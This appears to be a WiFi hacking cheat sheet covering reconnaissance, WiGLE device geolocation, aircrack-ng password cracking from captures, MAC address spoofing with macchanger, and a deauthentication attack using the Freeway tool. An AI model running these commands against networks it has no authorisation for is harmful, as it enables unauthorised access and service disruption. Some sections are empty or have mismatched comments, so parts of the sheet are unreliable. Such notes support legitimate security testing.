WiFi Hacking
Last modified: 2024-12-18
# IP addresses
ip addr
# specific interface
ip addr show eth0
ip addr show eth1
ip addr show tun0
# IPv4/6 only
ip -4 addr
ip -6 addr
# Static route
ip route
# Get the currently connected WiFi router's IP address (see the 'Default gateway' line in the output)
# Find any wireless devices
iw dev
# Display information of the specified device
iw dev <interface> info
# Scan wifi networks nearby the specified device
iw dev <interface> scan
# Find another computer's IP address/MAC address on the network
arp -av
# Get public IP address
curl https://api.ipify.org
Using WiGLE
If BSSIDs found, we can find the location for devices using WiGLE.
To find BSSID From SSID using WiGLE:
- Access to WiGLE and login.
- Go to View → Advanced Search.
- Open the General Search tab.
- Input the SSID in the SSID/Network Name.
- Check the result.
Delete Network Interfaces From Your Devices
ip link delete <iterface>
Crack WiFi Passwords
Default Router Credentials
Crack from A Packet Capture File
If we have a packet capture file (.cap or .pcap) of the WiFi network, we can crack the WiFi password using the file.
aircrack-ng example.cap -w wordlist.txt
MAC Address Spoofing
First of all, you need to use network adapter which has monitor mode on your machine.
Aircrack-ng is a complete suite of tools to assess WiFi network security.
# Show available interfaces airmon-ng # Put an interface into monitor mode airmon-ng start wlan0 airmon-ng start eth0 # or iwconfig wlan0 mode monitor iwconfig eth0 mode monitor # Choose the access point (monitor mode) airodump-ng wlan0mon
Retrieve Client's MAC Addresses
# Retrieve client's MAC address from the chosen access point # -c 9: channel 9 # --bssid: target router MAC address # -w psk: the dump file prefix # eth0: interface name airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -i wlan0mon airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk eth0
Spoof MAC Address using the Retrieved Address
# Take down the network at first ip link set wlan0 down # Set MAC address which you got by airodump-ng in the previous section macchanger -m XX:XX:XX:XX:XX:XX wlan0 # Bring up the network ip link set wlan0 up
# Check the current MAC address macchanger -s wlan0
Reset to the Original MAC Address
# Reset to the original (permanent) MAC address macchanger -p wlan0
Deauthentication Attack
Reference: https://medium.com/@flytechoriginal/state-of-wifi-security-in-2024-b88091015cc2
Using (Freeway)[https://github.com/FLOCK4H/Freeway], we can easily achieve this attack.
sudo Freeway -i wlan1 -a deauth
Other Useful Tools
The Swiss Army knife for 802.11, BLE, IPv4 and IPv6 networks reconnaissance and MITM attacks.
List of MAC OUI (Organizationally Unique Identifier). You can get the information from the BSSID.
Access to the OUI Standards
If the target BSSID is "B4:5D:50:AA:86:41", search text by inputting "B4-5D-50" on the string search.
Then check the information.